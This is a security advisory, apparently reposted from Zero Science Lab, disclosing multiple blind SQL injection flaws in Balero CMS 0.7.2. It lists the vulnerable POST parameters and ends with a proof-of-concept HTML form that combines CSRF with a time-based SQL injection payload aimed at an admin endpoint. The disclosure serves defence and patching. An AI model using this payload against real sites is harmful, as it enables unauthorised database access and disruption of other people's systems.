Balero CMS 0.7.2 SQL Injection

2015.04.08
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

Balero CMS v0.7.2 Multiple Blind SQL Injection Vulnerabilities Vendor: BaleroCMS Software Product web page: http://www.balerocms.com Affected version: 0.7.2 Summary: Balero CMS is an open source project that can help you manage the page of your company with just a few guided steps, minimizing the costs that many companies make to have your advertising medium and/or portal. Desc: The application suffers from multiple blind SQL injection vulnerabilities when input is passed to several POST parameters thru their affected modules which are not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Vulnerable POST parameters in affected modules: ----------------------------------------------- - pages [admin] - themes [admin] - code [mod-languages] - id [mod-blog, mod-virtual_page] - title [mod-blog] - a [mod-virtual_page] - virtual_title [mod-virtual_page] ----------------------------------------------- Tested on: Apache 2.4.10 (Win32) PHP 5.6.3 MySQL 5.6.21 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5238 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5238.php 04.03.2015 -- csrf+bsqli poc: <html> <body> <form action="http://localhost/balerocms/admin/edit_page/mod-virtual_page/id-11" method="POST"> <input type="hidden" name="virtual&#95;title" value="ZSL" /> <input type="hidden" name="a" value="1" /> <input type="hidden" name="content" value="Testingus" /> <input type="hidden" name="&#95;wysihtml5&#95;mode" value="1" /> <input type="hidden" name="id" value="11&apos;&#32;and&#32;benchmark&#32;&#40;50000000&#44;sha1&#40;1&#41;&#41;&#45;&#45;&#32;" /> <input type="hidden" name="submit&#95;delete" value="" /> <input type="submit" value="Submit form" /> </form> </body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top